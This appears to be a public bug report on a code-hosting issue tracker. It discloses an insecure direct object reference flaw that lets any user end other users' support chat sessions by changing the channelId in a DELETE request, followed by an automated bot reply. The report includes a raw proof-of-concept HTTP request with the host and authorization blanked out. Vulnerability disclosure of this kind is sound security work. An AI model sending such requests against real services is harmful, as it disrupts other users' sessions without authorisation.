[BUG] [Security] IDOR allows termination of any support chat session via DELETE /priapi/v1/assistant/session/<channelId>/

[iambouali]

Deployment Method

Source Code Deployment

Bug Description and Steps to Reproduce

Summary

An Insecure Direct Object Reference (IDOR) vulnerability allows an attacker to terminate any support chat session by incrementing the channelId in a DELETE request. By incrementing or modifying this ID, an attacker can terminate arbitrary chat sessions.

PoC

DELETE /priapi/v1/assistant/session/3372043839023027147/ HTTP/2
Host: -
Content-Length: 0
Sec-Ch-Ua-Platform: "macOS"
Authorization: -
Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132", "Google Chrome";v="132"
Sec-Ch-Ua-Bitness: "64"
App-Type: web
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Arch: "arm"
Accept: application/json
X-Simulated-Trading: 1
X-Client-Signature-Version: 1.3
X-Zkdex-Env: 0
X-Utc: 0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform-Version: "15.0.1"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

[OpenIM-Robot]

Hello! Thank you for filing an issue.

If this is a bug report, please include relevant logs to help us debug the problem.

Join slack 🤖 to connect and communicate with our developers.